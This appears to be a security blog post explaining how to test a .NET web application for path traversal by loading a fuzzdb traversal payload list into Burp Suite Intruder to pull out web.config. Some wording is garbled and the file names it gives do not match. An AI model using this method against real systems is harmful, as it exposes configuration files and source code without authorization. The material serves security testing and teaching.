INTRODUCE
One well-known, never outdated and impactful vulnerability is Path Traversal. This technique is also known as a dot-dot-slash (../) attack or as a method of directory browsing and it involves exploiting the lack of cleaning capabilities for user input, applied by the application. Use path name to retrieve files or folders from the file system located under the restricted parent folder. By manipulating the values through special characters, an attacker can cause the path name to resolve to a location outside the restricted directory.
In OWASP’s terminology, a path traversal attack belongs to category A5 of top 10 (2017): roken Access Control, so as one of the top 10 issues of 2017 we should pay special attention to it .
In this blog post, we will talk about an example of using path traversal to extract web.config through the Burp Suite Intruder Tool.
Previous posts on path traversal attack:
How to prevent Path Traversal in .NET From Path Traversal to Source Code in Asp.NET MVC Applications
TESTING STEP-BY-STEP
First, download Burp Suite Community Edition tool, a useful testing tool that offers a variety of automated and semi-automated features to improve security testing performance. In particular, the Burp Intruder feature can be very useful to exploit transmission vulnerabilities. Suppose there is a DotNet web application that is susceptible to path browsing. To exploit the problem, an attacker could try to download the full source code of the application by following this guide.
When an attacker finds an endpoint that could be vulnerable to Path Traversal, it is possible to send it to the Burp Intruder as shown in the following screenshot.
On the Intruder tab, the target has been set with the requirement that it be used to manipulate the web.config file. Make sure that the payload is entered correctly in the property position, otherwise perform the action “Clear §”, then select the property to fuzzing and click the “Add §” button.
To set the payload that Burp Intruder will use to execute requests, download the file traversals-8-deep-exotic-encoding.txt from fuzzdb project and provide it to the Burp Intruder by performing the following actions: 
- go to the “Payloads” sub-tab;
- choose from the dropdown list “Payload type” the value is “Simple List”;
- In the “Payload Options” panel click on the “Load …” button and choose path-traversal-fuzzing.txt (as shown in the screenshot below).
The next step is to add a Payload Processing rule to match and replace the placeholder “{FILE}” with the filename we want to extract (in our example it’s “web.config”), so click the “button Add ”. 
In the paylod processing rule, add Match for the string “{FILE}” and Replace for the string “web.config”, as shown in the following screenshot:
To improve the probability of a successful attack, the Grep-Match value (if known) can be added, to easily identify a positive response. Delete all existing rules:
Then add a new Grep-Match rule for the string “”, indicating that the web.config file has been found.
Finally, you should adjust Request Engine options based on web server limitations (anti-throttling, firewall, etc.) to avoid false results, such as increased retry latency.
HAPPENING A TON
If the endpoint will result vulnerable to path traversal, the column “configuration” will be checked.
